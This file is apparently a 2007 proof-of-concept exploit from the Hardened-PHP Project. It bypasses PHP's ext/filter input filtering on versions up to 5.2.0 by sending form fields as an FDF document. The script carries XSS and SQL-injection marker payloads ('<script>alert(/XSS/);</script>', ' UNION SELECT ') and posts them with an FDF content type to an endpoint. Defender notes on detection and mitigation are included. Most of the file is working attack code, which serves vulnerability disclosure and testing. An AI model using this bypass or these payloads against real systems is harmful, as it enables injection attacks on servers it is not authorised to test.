
PHP <= 5.2.0 ext/filter FDF Post Filter Bypass Exploit

PHP <= 5.2.0 ext/filter FDF Post Filter Bypass Exploit

<?php
////////////////////////////////////////////////////////////////////////
// _ _        _           _    ___ _ _ ___ //
// | || | __ _ _ _ __| | ___ _ _  ___ __| | ___ | _ \| || || _ \ //
// | __ |/ _` || '_|/ _` |/ -_)| ' \ / -_)/ _` ||___|| _/| __ || _/ //
// |_||_|\__,_||_| \__,_|\___||_||_|\___|\__,_|   |_| |_||_||_|  //
//                                  //
//     Proof of concept code from the Hardened-PHP Project    //
//          (C) Copyright 2007 Stefan Esser         //
//                                  //
////////////////////////////////////////////////////////////////////////
//      PHP ext/filter FDF POST Filter Bypass Exploit      //
////////////////////////////////////////////////////////////////////////

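// Proof of concept: submits form fields to a PHP endpoint as an FDF document
// (Content-Type: application/vnd.fdf) instead of a urlencoded POST body, so
// that the response shows whether the values arrived in the target's $_POST
// unfiltered. Per the advisory title this concerns ext/filter on PHP <= 5.2.0.
// NOTE(review): presumably ext/fdf's own POST handler fills $_POST without
// passing the values through ext/filter - confirm against the advisory text.
//
// Defender notes:
//  - Detection: a POST carrying "Content-Type: application/vnd.fdf" to an
//    endpoint that does not process PDF forms is unusual and worth alerting on.
//  - Mitigation: run a PHP release newer than the affected range, do not load
//    the fdf extension where it is unused, and do not treat a default input
//    filter as the only control; validate and escape at the point of use
//    (parameterised queries, context-aware output encoding).

// This is meant as a protection against remote file inclusion.
// The guard halts the script before anything else runs, so the file does
// nothing if it is fetched or included unintentionally.
die("REMOVE THIS LINE");

// _POST is the array that will be sent to the url in $url
// The two values are marker strings (script markup, a SQL fragment) that an
// input filter would be expected to alter; seeing them unchanged in the
// response indicates the filter was not applied.
$_POST = array();
$_POST['var1'] = "<script>alert(/XSS/);</script>";
$_POST['var2'] = " ' UNION SELECT ";

// Loopback test endpoint; presumably a page that prints the variables it
// receives (e.g. phpinfo output) - confirm for your lab setup.
$url = "http://127.0.0.1/info.php";

// You do not need to change anything below this

// Build an FDF document with one field per entry (requires ext/fdf locally).
$outfdf = fdf_create();
foreach ($_POST as $key => $value) {
  // Last argument 0: store the value as a PDF string rather than a PDF Name.
  fdf_set_value($outfdf, $key, $value, 0);
}
// The document is serialised through a scratch file in the working directory,
// read back as the raw request body, and the file is removed again.
fdf_save($outfdf, "outtest.fdf");
fdf_close($outfdf);

$ret = file_get_contents("outtest.fdf");
unlink("outtest.fdf");

// HTTP stream context: POST the raw FDF bytes with the FDF media type. The
// Content-Type header is what distinguishes this request from a normal form
// submission.
$params = array('http' => array(
   'method' => 'POST',
   'content' => $ret,
   'header' => 'Content-Type: application/vnd.fdf'
));

$ctx = stream_context_create($params);
// Warnings are suppressed with @; a failed request is reported by the die().
$fp = @fopen($url, 'rb', false, $ctx);
if (!$fp) {
  die("Cannot open $url");
}
$response = @stream_get_contents($fp);

// Print the target's response so the received values can be inspected.
echo $response;
echo "\n";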
?>
